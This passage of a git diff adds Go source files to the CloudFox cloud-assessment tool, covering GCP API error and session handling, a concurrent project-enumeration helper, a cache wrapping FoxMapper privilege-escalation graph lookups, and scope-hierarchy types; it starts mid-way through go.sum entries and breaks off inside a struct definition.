h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= 
+google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= @@ -529,3 +622,5 @@ gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= diff --git a/internal/gcp/base.go b/internal/gcp/base.go new file mode 100644 index 00000000..2c6a8dc2 --- /dev/null +++ b/internal/gcp/base.go @@ -0,0 +1,570 @@ +package gcpinternal + +import ( + "context" + "errors" + "fmt" + "os" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + "github.com/spf13/cobra" + "google.golang.org/api/googleapi" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// ------------------------------ +// Common GCP API Error Types +// ------------------------------ +var ( + ErrAPINotEnabled = errors.New("API not enabled") + ErrPermissionDenied = errors.New("permission denied") + ErrNotFound = errors.New("resource not found") + ErrVPCServiceControls = errors.New("blocked by VPC Service Controls") + ErrSessionInvalid = errors.New("session invalid") +) + +// ------------------------------ +// Session Error 
// ------------------------------
// Session Error Detection
// ------------------------------
// These functions detect when GCP credentials are invalid/expired
// and exit with clear messages to prevent incomplete data.

// IsGCPSessionError checks if an error indicates a session/authentication problem.
// If true, the program should exit with a clear message - continuing would produce incomplete results.
//
// Detection happens in three layers:
//  1. gRPC status errors carrying codes.Unauthenticated (gRPC-based clients).
//  2. REST errors (*googleapi.Error) with HTTP 401 Unauthorized.
//  3. Case-insensitive substring matching on the error text for known
//     credential-failure, network-unreachable, and OAuth-token phrases.
//
// NOTE(review): the boolean chains below mix && and || without parentheses.
// Go binds && tighter than ||, so each "x && y" pair forms a single
// alternative - the grouping is correct as written, just easy to misread.
func IsGCPSessionError(err error) bool {
	if err == nil {
		return false
	}

	// Check for gRPC status errors
	if grpcStatus, ok := status.FromError(err); ok {
		switch grpcStatus.Code() {
		case codes.Unauthenticated:
			return true
		}
	}

	// Check for REST API errors (googleapi.Error)
	var googleErr *googleapi.Error
	if errors.As(err, &googleErr) {
		// 401 Unauthorized is always a session error
		if googleErr.Code == 401 {
			return true
		}
	}

	// Check error message for common session issues
	errStr := strings.ToLower(err.Error())

	// Authentication failures
	if strings.Contains(errStr, "unauthenticated") ||
		strings.Contains(errStr, "invalid_grant") ||
		strings.Contains(errStr, "token has been expired or revoked") ||
		strings.Contains(errStr, "token expired") ||
		strings.Contains(errStr, "refresh token") && strings.Contains(errStr, "expired") ||
		strings.Contains(errStr, "credentials") && strings.Contains(errStr, "expired") ||
		strings.Contains(errStr, "unable to authenticate") ||
		strings.Contains(errStr, "authentication failed") ||
		strings.Contains(errStr, "could not find default credentials") ||
		strings.Contains(errStr, "application default credentials") && strings.Contains(errStr, "not found") {
		return true
	}

	// Connection issues that indicate GCP is unreachable
	if strings.Contains(errStr, "connection refused") ||
		strings.Contains(errStr, "no such host") ||
		strings.Contains(errStr, "connection reset") {
		return true
	}

	// OAuth issues
	if strings.Contains(errStr, "oauth2") && (strings.Contains(errStr, "token") || strings.Contains(errStr, "expired")) {
		return true
	}

	return false
}

// CheckGCPSessionError checks if an error is a session error and exits if so.
// Call this on every API error to ensure session issues are caught immediately.
// Returns true if error was a session error (program will have exited).
// Returns false if error is not a session error (caller should handle normally).
//
// Parameters:
//   - err: the API error to inspect (nil is handled safely by IsGCPSessionError).
//   - logger: module logger used to print the banner before exiting.
//   - moduleName: module name reported alongside every banner line.
//
// The switch below is order-sensitive: more specific phrases (invalid_grant,
// expired refresh token, missing ADC) are matched before the generic
// "unauthenticated" catch-all so the user sees the most actionable reason.
func CheckGCPSessionError(err error, logger internal.Logger, moduleName string) bool {
	if !IsGCPSessionError(err) {
		return false
	}

	// Determine the specific session issue for a helpful message
	errStr := strings.ToLower(err.Error())
	var reason string

	switch {
	case strings.Contains(errStr, "invalid_grant") || strings.Contains(errStr, "token has been expired or revoked"):
		reason = "Your GCP credentials have expired or been revoked"
	case strings.Contains(errStr, "refresh token") && strings.Contains(errStr, "expired"):
		reason = "Your refresh token has expired - please re-authenticate"
	case strings.Contains(errStr, "could not find default credentials") || strings.Contains(errStr, "application default credentials"):
		reason = "No GCP credentials found - run: gcloud auth application-default login"
	case strings.Contains(errStr, "unauthenticated") || strings.Contains(errStr, "authentication failed"):
		reason = "Authentication failed - your credentials are invalid"
	case strings.Contains(errStr, "connection refused") || strings.Contains(errStr, "no such host"):
		reason = "Cannot connect to GCP APIs - check your network connection"
	default:
		reason = "Session error detected - credentials may be invalid"
	}

	// Print a hard-to-miss banner, then terminate: partial results from a
	// dead session are worse than no results.
	logger.ErrorM("", moduleName)
	logger.ErrorM("╔════════════════════════════════════════════════════════════════╗", moduleName)
	logger.ErrorM("║ SESSION ERROR DETECTED ║", moduleName)
	logger.ErrorM("╠════════════════════════════════════════════════════════════════╣", moduleName)
	logger.ErrorM(fmt.Sprintf("║ %s", reason), moduleName)
	logger.ErrorM("║ ║", moduleName)
	logger.ErrorM("║ Your GCP session is no longer valid. ║", moduleName)
	logger.ErrorM("║ Results may be incomplete - please fix and re-run. ║", moduleName)
	logger.ErrorM("╠════════════════════════════════════════════════════════════════╣", moduleName)
	logger.ErrorM("║ Common fixes: ║", moduleName)
	logger.ErrorM("║ • Re-authenticate: gcloud auth login ║", moduleName)
	logger.ErrorM("║ • ADC login: gcloud auth application-default login ║", moduleName)
	logger.ErrorM("║ • Check account: gcloud auth list ║", moduleName)
	logger.ErrorM("║ • Service account: check GOOGLE_APPLICATION_CREDENTIALS ║", moduleName)
	logger.ErrorM("╚════════════════════════════════════════════════════════════════╝", moduleName)
	logger.ErrorM("", moduleName)
	logger.ErrorM(fmt.Sprintf("Original error: %v", err), moduleName)

	os.Exit(1)
	return true // Never reached, but satisfies compiler
}

// ParseGCPError converts GCP API errors into cleaner, standardized error types
// This should be used by all GCP service modules for consistent error handling
// Handles both REST API errors (googleapi.Error) and gRPC errors (status.Error)
func ParseGCPError(err error, apiName string) error {
	if err == nil {
		return nil
	}

	// Check for gRPC status errors (used by Cloud Asset, Spanner, and other gRPC-based APIs)
	if grpcStatus, ok := status.FromError(err); ok {
		errStr := err.Error()

		switch grpcStatus.Code() {
		case codes.PermissionDenied:
			// Check for SERVICE_DISABLED in error details or message
			if strings.Contains(errStr, "SERVICE_DISABLED") {
				return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName)
			}
			// Check for quota project requirement (API not enabled or misconfigured)
			if strings.Contains(errStr, "requires a quota project") {
				return fmt.Errorf("%w: %s (set quota project with: gcloud auth application-default set-quota-project PROJECT_ID)", ErrAPINotEnabled, apiName)
			}
			return ErrPermissionDenied

		case codes.NotFound:
			return
ErrNotFound + + case codes.Unauthenticated: + return fmt.Errorf("authentication failed - check credentials") + + case codes.ResourceExhausted: + return fmt.Errorf("rate limited - too many requests") + + case codes.Unavailable, codes.Internal: + return fmt.Errorf("GCP service error: %s", grpcStatus.Message()) + + case codes.InvalidArgument: + return fmt.Errorf("bad request: %s", grpcStatus.Message()) + } + + // Default: return cleaner error message + return fmt.Errorf("gRPC error (%s): %s", grpcStatus.Code().String(), grpcStatus.Message()) + } + + // Check for REST API errors (googleapi.Error) + var googleErr *googleapi.Error + if errors.As(err, &googleErr) { + errStr := googleErr.Error() + + switch googleErr.Code { + case 403: + // Check for SERVICE_DISABLED first - this is usually the root cause + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Check for VPC Service Controls + if strings.Contains(errStr, "VPC_SERVICE_CONTROLS") || + strings.Contains(errStr, "SECURITY_POLICY_VIOLATED") || + strings.Contains(errStr, "organization's policy") { + return ErrVPCServiceControls + } + // Permission denied + if strings.Contains(errStr, "PERMISSION_DENIED") || + strings.Contains(errStr, "does not have") || + strings.Contains(errStr, "permission") { + return ErrPermissionDenied + } + // Generic 403 + return ErrPermissionDenied + + case 404: + return ErrNotFound + + case 400: + return fmt.Errorf("bad request: %s", googleErr.Message) + + case 429: + return fmt.Errorf("rate limited - too many requests") + + case 500, 502, 503, 504: + return fmt.Errorf("GCP service error (code %d)", googleErr.Code) + } + + // Default: return cleaner error message + return fmt.Errorf("API error (code %d): %s", googleErr.Code, googleErr.Message) + } + + // Fallback: check error string for common patterns + errStr := err.Error() + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, 
apiName) + } + // Check for quota project requirement (common with ADC) + if strings.Contains(errStr, "requires a quota project") { + return fmt.Errorf("%w: %s (set quota project with: gcloud auth application-default set-quota-project PROJECT_ID)", ErrAPINotEnabled, apiName) + } + if strings.Contains(errStr, "PERMISSION_DENIED") || strings.Contains(errStr, "PermissionDenied") { + return ErrPermissionDenied + } + + return err +} + +// IsPermissionDenied checks if an error is a permission denied error +func IsPermissionDenied(err error) bool { + return errors.Is(err, ErrPermissionDenied) +} + +// IsAPINotEnabled checks if an error is an API not enabled error +func IsAPINotEnabled(err error) bool { + return errors.Is(err, ErrAPINotEnabled) +} + +// HandleGCPError logs an appropriate message for a GCP API error and returns true if execution should continue +// Returns false if the error is fatal and the caller should stop processing +// IMPORTANT: This now checks for session errors first and will exit if credentials are invalid! 
+func HandleGCPError(err error, logger internal.Logger, moduleName string, resourceDesc string) bool { + if err == nil { + return true // No error, continue + } + + // CRITICAL: Check for session errors first - exit immediately if credentials are invalid + // This prevents incomplete data from being saved + CheckGCPSessionError(err, logger, moduleName) + + // Parse the raw GCP error into a standardized error type + parsedErr := ParseGCPError(err, "") + + switch { + case errors.Is(parsedErr, ErrAPINotEnabled): + logger.ErrorM(fmt.Sprintf("%s - API not enabled", resourceDesc), moduleName) + return false // Can't continue without API enabled + + case errors.Is(parsedErr, ErrVPCServiceControls): + logger.ErrorM(fmt.Sprintf("%s - blocked by VPC Service Controls", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(parsedErr, ErrPermissionDenied): + logger.ErrorM(fmt.Sprintf("%s - permission denied", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(parsedErr, ErrNotFound): + // Not found is often expected, don't log as error + return true + + default: + // For unknown errors, log a concise message without the full error details + logger.ErrorM(fmt.Sprintf("%s - error occurred", resourceDesc), moduleName) + return true // Continue with other resources + } +} + +// ------------------------------ +// CommandContext holds all common initialization data for GCP commands +// ------------------------------ +type CommandContext struct { + // Context and logger + Ctx context.Context + Logger internal.Logger + + // Project information + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration flags + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int + FlatOutput bool // When true, use legacy flat output structure + + // Hierarchy support for 
per-project output + Hierarchy *ScopeHierarchy // Populated by DetectScopeHierarchy +} + +// ------------------------------ +// BaseGCPModule - Embeddable struct with common fields for all GCP modules +// ------------------------------ +// This struct eliminates duplicate field declarations across modules. +// Modules embed this struct instead of declaring these fields individually. +// +// Usage: +// +// type BucketsModule struct { +// gcpinternal.BaseGCPModule // Embed the base fields +// +// // Module-specific fields +// Buckets []BucketInfo +// mu sync.Mutex +// } +type BaseGCPModule struct { + // Project and identity + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int + FlatOutput bool // When true, use legacy flat output structure + + // Hierarchy support for per-project output + Hierarchy *ScopeHierarchy // Populated by DetectScopeHierarchy + + // Progress tracking (AWS/Azure style) + CommandCounter internal.CommandCounter +} + +// GetProjectName returns the display name for a project ID, falling back to the ID if not found +func (b *BaseGCPModule) GetProjectName(projectID string) string { + if b.ProjectNames != nil { + if name, ok := b.ProjectNames[projectID]; ok { + return name + } + } + return projectID +} + +// ------------------------------ +// NewBaseGCPModule - Helper to create BaseGCPModule from CommandContext +// ------------------------------ +func NewBaseGCPModule(cmdCtx *CommandContext) BaseGCPModule { + return BaseGCPModule{ + ProjectIDs: cmdCtx.ProjectIDs, + ProjectNames: cmdCtx.ProjectNames, + Account: cmdCtx.Account, + Verbosity: cmdCtx.Verbosity, + WrapTable: cmdCtx.WrapTable, + OutputDirectory: cmdCtx.OutputDirectory, + Format: cmdCtx.Format, + Goroutines: cmdCtx.Goroutines, + FlatOutput: cmdCtx.FlatOutput, + Hierarchy: cmdCtx.Hierarchy, + } +} 
+ +// BuildPathBuilder creates a PathBuilder function for hierarchical output +// This function returns a closure that builds paths based on the module's configuration +func (b *BaseGCPModule) BuildPathBuilder() internal.PathBuilder { + return func(scopeType string, scopeID string) string { + if b.Hierarchy == nil { + // Fallback to flat output if no hierarchy is available + return BuildFlatPath(b.OutputDirectory, b.Account, &ScopeHierarchy{}) + } + return BuildHierarchicalPath(b.OutputDirectory, b.Account, b.Hierarchy, scopeType, scopeID) + } +} + +// ------------------------------ +// ProjectProcessor - Callback function type for processing individual projects +// ------------------------------ +type ProjectProcessor func(ctx context.Context, projectID string, logger internal.Logger) + +// ------------------------------ +// RunProjectEnumeration - Orchestrates enumeration across multiple projects with concurrency +// ------------------------------ +// This method centralizes the project enumeration orchestration pattern. +// It handles WaitGroup, semaphore, spinner, and CommandCounter management automatically. 
+// +// Usage: +// +// func (m *StorageModule) Execute(ctx context.Context, logger internal.Logger) { +// m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGE_MODULE_NAME, m.processProject) +// m.writeOutput(ctx, logger) +// } +func (b *BaseGCPModule) RunProjectEnumeration( + ctx context.Context, + logger internal.Logger, + projectIDs []string, + moduleName string, + processor ProjectProcessor, +) { + logger.InfoM(fmt.Sprintf("Enumerating resources for %d project(s)", len(projectIDs)), moduleName) + + // Setup synchronization primitives + var wg sync.WaitGroup + semaphore := make(chan struct{}, b.Goroutines) + + // Start progress spinner + spinnerDone := make(chan bool) + go internal.SpinUntil(moduleName, &b.CommandCounter, spinnerDone, "projects") + + // Process each project with goroutines + for _, projectID := range projectIDs { + b.CommandCounter.Total++ + b.CommandCounter.Pending++ + wg.Add(1) + + go func(project string) { + defer func() { + b.CommandCounter.Executing-- + b.CommandCounter.Complete++ + wg.Done() + }() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + b.CommandCounter.Pending-- + b.CommandCounter.Executing++ + + // Call the module-specific processor + processor(ctx, project, logger) + }(projectID) + } + + // Wait for all projects to complete + wg.Wait() + + // Stop spinner + spinnerDone <- true + <-spinnerDone +} + +// ------------------------------ +// parseMultiValueFlag parses a flag value that can contain comma-separated +// and/or space-separated values +// ------------------------------ +func parseMultiValueFlag(flagValue string) []string { + if flagValue == "" { + return nil + } + + // Replace commas with spaces, then split by whitespace + normalized := strings.ReplaceAll(flagValue, ",", " ") + fields := strings.Fields(normalized) + + // Deduplicate while preserving order + seen := make(map[string]bool) + result := []string{} + for _, field := range fields { + if !seen[field] { + 
seen[field] = true + result = append(result, field) + } + } + return result +} + +// ------------------------------ +// InitializeCommandContext - Eliminates duplicate initialization code across commands +// ------------------------------ +// This helper extracts flags, resolves projects and account info. +// +// Usage: +// +// cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGE_MODULE_NAME) +// if err != nil { +// return // error already logged +// } +func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandContext, error) { + ctx := cmd.Context() + logger := internal.NewLogger() + + // -------------------- Extract flags -------------------- + parentCmd := cmd.Parent() + verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") + wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") + outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") + format, _ := parentCmd.PersistentFlags().GetString("output") + flatOutput, _ := parentCmd.PersistentFlags().GetBool("flat-output") + + // Default to "all" format if not set (GCP doesn't expose this flag yet) + if format == "" { + format = "all" + } + + // -------------------- Get project IDs from context -------------------- + var projectIDs []string + if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { + projectIDs = value + } else { + logger.ErrorM("Could not retrieve projectIDs from context or value is empty", moduleName) + return nil, fmt.Errorf("no project IDs provided") + } + + // -------------------- Get project names from context -------------------- + var projectNames map[string]string + if value, ok := ctx.Value("projectNames").(map[string]string); ok { + projectNames = value + } else { + // Initialize empty map if not provided - modules can still work without names + projectNames = make(map[string]string) + for _, id := range projectIDs { + projectNames[id] = id // fallback to using ID as name + } + } + + // 
-------------------- Get account from context -------------------- + var account string + if value, ok := ctx.Value("account").(string); ok { + account = value + } else { + logger.ErrorM("Could not retrieve account email from context", moduleName) + // Don't fail - some modules can continue without account info + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Resolved %d project(s), account: %s", len(projectIDs), account), moduleName) + } + + // -------------------- Get hierarchy from context (if populated) -------------------- + var hierarchy *ScopeHierarchy + if value, ok := ctx.Value("hierarchy").(*ScopeHierarchy); ok { + hierarchy = value + } + + // -------------------- Build and return context -------------------- + return &CommandContext{ + Ctx: ctx, + Logger: logger, + ProjectIDs: projectIDs, + ProjectNames: projectNames, + Account: account, + Verbosity: verbosity, + WrapTable: wrap, + OutputDirectory: outputDirectory, + Format: format, + Goroutines: 5, // Default concurrency + FlatOutput: flatOutput, + Hierarchy: hierarchy, + }, nil +} diff --git a/internal/gcp/foxmapper_cache.go b/internal/gcp/foxmapper_cache.go new file mode 100755 index 00000000..3308e771 --- /dev/null +++ b/internal/gcp/foxmapper_cache.go @@ -0,0 +1,371 @@ +package gcpinternal + +import ( + "context" + "fmt" + "os" + "path/filepath" + "strings" + "time" + + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" +) + +// FoxMapperCache wraps FoxMapperService for use by CloudFox modules +// This provides access to FoxMapper's graph-based privilege escalation analysis +type FoxMapperCache struct { + service *foxmapperservice.FoxMapperService + populated bool + identifier string + loadedPath string + dataAge time.Duration +} + +// NewFoxMapperCache creates a new FoxMapper cache +func NewFoxMapperCache() *FoxMapperCache { + return &FoxMapperCache{ + service: foxmapperservice.New(), + } +} + +// LoadFromOrg loads FoxMapper 
data for an organization +func (c *FoxMapperCache) LoadFromOrg(orgID string) error { + err := c.service.LoadGraph(orgID, true) + if err != nil { + return err + } + c.populated = true + c.identifier = orgID + return nil +} + +// LoadFromProject loads FoxMapper data for a project +func (c *FoxMapperCache) LoadFromProject(projectID string) error { + err := c.service.LoadGraph(projectID, false) + if err != nil { + return err + } + c.populated = true + c.identifier = projectID + return nil +} + +// LoadFromPath loads FoxMapper data from a custom path +func (c *FoxMapperCache) LoadFromPath(path string) error { + err := c.service.LoadGraphFromPath(path) + if err != nil { + return err + } + c.populated = true + c.identifier = path + return nil +} + +// TryLoad attempts to load FoxMapper data, trying org first then each project +func (c *FoxMapperCache) TryLoad(orgID string, projectIDs []string) error { + // Try org first + if orgID != "" { + if err := c.LoadFromOrg(orgID); err == nil { + return nil + } + } + // Try each project + for _, projectID := range projectIDs { + if err := c.LoadFromProject(projectID); err == nil { + return nil + } + } + return fmt.Errorf("could not load FoxMapper data for org %s or any of %d projects", orgID, len(projectIDs)) +} + +// IsPopulated returns whether the cache has data +func (c *FoxMapperCache) IsPopulated() bool { + return c.populated +} + +// GetAttackSummary returns attack path summary for a principal +func (c *FoxMapperCache) GetAttackSummary(principal string) string { + if !c.populated { + return "run foxmapper" + } + return c.service.GetAttackSummary(principal) +} + +// DoesPrincipalHavePathToAdmin checks if principal can escalate to admin +func (c *FoxMapperCache) DoesPrincipalHavePathToAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.DoesPrincipalHavePathToAdmin(principal) +} + +// IsPrincipalAdmin checks if principal is admin +func (c *FoxMapperCache) IsPrincipalAdmin(principal string) 
bool { + if !c.populated { + return false + } + return c.service.IsPrincipalAdmin(principal) +} + +// GetPrivescPaths returns privesc paths for a principal +func (c *FoxMapperCache) GetPrivescPaths(principal string) []foxmapperservice.PrivescPath { + if !c.populated { + return nil + } + return c.service.GetPrivescPaths(principal) +} + +// GetService returns the underlying FoxMapper service +func (c *FoxMapperCache) GetService() *foxmapperservice.FoxMapperService { + return c.service +} + +// GetStats returns statistics about the FoxMapper graph +func (c *FoxMapperCache) GetStats() (totalNodes, adminNodes, nodesWithPrivesc int) { + if !c.populated || c.service == nil { + return 0, 0, 0 + } + summary := c.service.GetPrivescSummary() + totalNodes = summary["total_nodes"].(int) + adminNodes = summary["admin_nodes"].(int) + nodesWithPrivesc = summary["nodes_with_privesc"].(int) + return +} + +// GetIdentifier returns the org/project ID this cache was loaded for +func (c *FoxMapperCache) GetIdentifier() string { + return c.identifier +} + +// GetDataAge returns how old the FoxMapper data is +func (c *FoxMapperCache) GetDataAge() time.Duration { + return c.dataAge +} + +// GetDataAgeDays returns the age of FoxMapper data in days +func (c *FoxMapperCache) GetDataAgeDays() int { + return int(c.dataAge.Hours() / 24) +} + +// SetLoadedPath sets the path and calculates data age from file modification time +func (c *FoxMapperCache) SetLoadedPath(path string) { + c.loadedPath = path + // Try to get the modification time of the nodes.json file + nodesPath := filepath.Join(path, "graph", "nodes.json") + if info, err := os.Stat(nodesPath); err == nil { + c.dataAge = time.Since(info.ModTime()) + } +} + +// HasPrivesc checks if a service account has privilege escalation potential +func (c *FoxMapperCache) HasPrivesc(serviceAccount string) (bool, string) { + if !c.populated { + return false, "" + } + + node := c.service.GetNode(serviceAccount) + if node == nil { + return false, "" + } 
+ + if node.IsAdmin { + return true, fmt.Sprintf("Admin (%s)", node.AdminLevel) + } + + if node.PathToAdmin { + paths := c.service.GetPrivescPaths(serviceAccount) + if len(paths) > 0 { + conf := paths[0].Confidence + if conf != "" && conf != "high" { + return true, fmt.Sprintf("Privesc (%d hops, %s confidence)", paths[0].HopCount, conf) + } + return true, fmt.Sprintf("Privesc (%d hops)", paths[0].HopCount) + } + return true, "Privesc" + } + + return false, "" +} + +// GetAdminStatus returns the admin status for a principal from FoxMapper data +// Returns: isAdmin (bool), adminLevel (string: "Org", "Folder", "Project", or "") +func (c *FoxMapperCache) GetAdminStatus(principal string) (bool, string) { + if !c.populated { + return false, "" + } + + // Clean the principal - remove prefixes if present + cleanPrincipal := principal + if strings.HasPrefix(principal, "serviceAccount:") { + cleanPrincipal = strings.TrimPrefix(principal, "serviceAccount:") + } else if strings.HasPrefix(principal, "user:") { + cleanPrincipal = strings.TrimPrefix(principal, "user:") + } else if strings.HasPrefix(principal, "group:") { + cleanPrincipal = strings.TrimPrefix(principal, "group:") + } + + node := c.service.GetNode(cleanPrincipal) + if node == nil { + return false, "" + } + + if node.IsAdmin { + level := node.AdminLevel + // Capitalize for display + switch level { + case "org": + return true, "Org" + case "folder": + return true, "Folder" + case "project": + return true, "Project" + default: + if level == "" { + return true, "Project" // Default to project if not specified + } + return true, level + } + } + + return false, "" +} + +// Context key for FoxMapper cache +type foxMapperCacheKey struct{} + +// GetFoxMapperCacheFromContext retrieves the FoxMapper cache from context +func GetFoxMapperCacheFromContext(ctx context.Context) *FoxMapperCache { + if cache, ok := ctx.Value(foxMapperCacheKey{}).(*FoxMapperCache); ok { + return cache + } + return nil +} + +// 
SetFoxMapperCacheInContext returns a new context with the FoxMapper cache +func SetFoxMapperCacheInContext(ctx context.Context, cache *FoxMapperCache) context.Context { + return context.WithValue(ctx, foxMapperCacheKey{}, cache) +} + +// TryLoadFoxMapper attempts to find and load FoxMapper data +// Returns the loaded cache or nil if not found +// If org-level graph exists, uses that. Otherwise, loads and merges all project graphs. +func TryLoadFoxMapper(orgID string, projectIDs []string) *FoxMapperCache { + cache := NewFoxMapperCache() + + // Try org first - if it exists, it should contain all projects + if orgID != "" { + if path, err := foxmapperservice.FindFoxMapperData(orgID, true); err == nil { + if err := cache.LoadFromOrg(orgID); err == nil { + cache.SetLoadedPath(path) + return cache + } + } + } + + // No org-level graph - try to load and merge all project graphs + loadedCount := 0 + var firstPath string + for _, projectID := range projectIDs { + if loadedCount == 0 { + // First project - load normally + if path, err := foxmapperservice.FindFoxMapperData(projectID, false); err == nil { + if err := cache.LoadFromProject(projectID); err == nil { + firstPath = path + loadedCount++ + } + } + } else { + // Subsequent projects - merge into existing graph + path, err := foxmapperservice.FindFoxMapperData(projectID, false) + if err == nil { + if err := cache.service.MergeGraphFromPath(path); err == nil { + loadedCount++ + } + } + } + } + + // If we loaded multiple projects, rebuild the graph + if loadedCount > 1 { + cache.service.RebuildAfterMerge() + cache.identifier = fmt.Sprintf("%d projects", loadedCount) + } + + if loadedCount > 0 { + if firstPath != "" { + cache.SetLoadedPath(firstPath) + } + return cache + } + + return nil +} + +// FindFoxMapperData searches for FoxMapper data and returns the path if found +func FindFoxMapperData(identifier string, isOrg bool) (string, error) { + return foxmapperservice.FindFoxMapperData(identifier, isOrg) +} + +// 
AttackSummaryProvider is an interface that FoxMapperCache implements +// This allows modules to use the cache interchangeably +type AttackSummaryProvider interface { + IsPopulated() bool + GetAttackSummary(principal string) string +} + +// GetBestAttackSummary returns attack summary from FoxMapper +func GetBestAttackSummary(ctx context.Context, principal string) string { + if fmCache := GetFoxMapperCacheFromContext(ctx); fmCache != nil && fmCache.IsPopulated() { + return fmCache.GetAttackSummary(principal) + } + return "run foxmapper" +} + +// All-checks mode context helper +type allChecksModeKey struct{} + +// SetAllChecksMode sets a flag in context indicating all-checks mode is active +func SetAllChecksMode(ctx context.Context, enabled bool) context.Context { + return context.WithValue(ctx, allChecksModeKey{}, enabled) +} + +// GetAllChecksMode checks if all-checks mode is active in context +func GetAllChecksMode(ctx context.Context) bool { + if enabled, ok := ctx.Value(allChecksModeKey{}).(bool); ok { + return enabled + } + return false +} + +// GetAttackSummaryFromCaches returns attack summary using FoxMapper cache +// The second parameter is kept for backward compatibility but is ignored +func GetAttackSummaryFromCaches(foxMapperCache *FoxMapperCache, _ interface{}, principal string) string { + // Clean the principal - remove prefixes if present + cleanPrincipal := principal + if strings.HasPrefix(principal, "serviceAccount:") { + cleanPrincipal = strings.TrimPrefix(principal, "serviceAccount:") + } else if strings.HasPrefix(principal, "user:") { + cleanPrincipal = strings.TrimPrefix(principal, "user:") + } + + // Use FoxMapper for graph-based analysis + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + return foxMapperCache.GetAttackSummary(cleanPrincipal) + } + + return "run foxmapper" +} + +// GetAdminStatusFromCache returns admin status from FoxMapper cache +// Returns the admin level (Org/Folder/Project) if admin, empty string otherwise +func 
GetAdminStatusFromCache(foxMapperCache *FoxMapperCache, principal string) string { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return "" + } + + isAdmin, level := foxMapperCache.GetAdminStatus(principal) + if isAdmin { + return level + } + return "" +} diff --git a/internal/gcp/hierarchy.go b/internal/gcp/hierarchy.go new file mode 100644 index 00000000..8280ad8c --- /dev/null +++ b/internal/gcp/hierarchy.go @@ -0,0 +1,472 @@ +package gcpinternal + +import ( + "path/filepath" + "regexp" + "strings" +) + +// ------------------------------ +// Scope Hierarchy Types +// ------------------------------ + +// ScopeHierarchy represents the discovered GCP resource hierarchy +type ScopeHierarchy struct { + Organizations []OrgScope // Organizations (may be empty if no org access) + Folders []FolderScope // Folders (may be empty) + Projects []ProjectScope // All projects being processed + StandaloneProjs []string // Project IDs not belonging to any known org +} + +// OrgScope represents an organization in the hierarchy +type OrgScope struct { + ID string // Numeric org ID (e.g., "672370982061") + DisplayName string // Org display name (e.g., "acme.com") - may be empty if inaccessible + Accessible bool // Whether we can enumerate org-level resources + FolderIDs []string // Folder IDs directly under this org + ProjectIDs []string // Project IDs under this org (directly or via folders) +} + +// FolderScope represents a folder in the hierarchy +type FolderScope struct { + ID string // Folder ID + DisplayName string // Folder display name + ParentType string // "organization" or "folder" + ParentID string // Parent org or folder ID + ProjectIDs []string // Project IDs directly under this folder + Depth int // Depth in hierarchy (0 = direct child of org) +} + +// ProjectScope represents a project in the hierarchy +type ProjectScope struct { + ID string // Project ID + Name string // Project 